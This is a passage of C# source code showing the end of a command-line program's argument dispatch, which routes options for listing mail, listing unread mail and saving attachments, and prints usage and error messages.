ListUnreadMail(ns, args[1], "short"); 386 | else if (args[0] == "ListMailEx") 387 | ListMail(ns, args[1], "all"); 388 | else if (args[0] == "ListUnreadMailEx") 389 | ListUnreadMail(ns, args[1], "all"); 390 | else 391 | Console.WriteLine("[!] Wrong parameter"); 392 | } 393 | 394 | else if (args.Length == 3) 395 | { 396 | if (args[0] == "SaveAttachment") 397 | SaveAttachment(ns, args[1], args[2]); 398 | else 399 | Console.WriteLine("[!] Wrong parameter"); 400 | } 401 | else 402 | { 403 | ShowUsage(); 404 | } 405 | } 406 | catch(System.Exception ex) 407 | { 408 | Console.WriteLine("[!] Exception:" + ex.Message); 409 | } 410 | } 411 | } 412 | } 413 | --------------------------------------------------------------------------------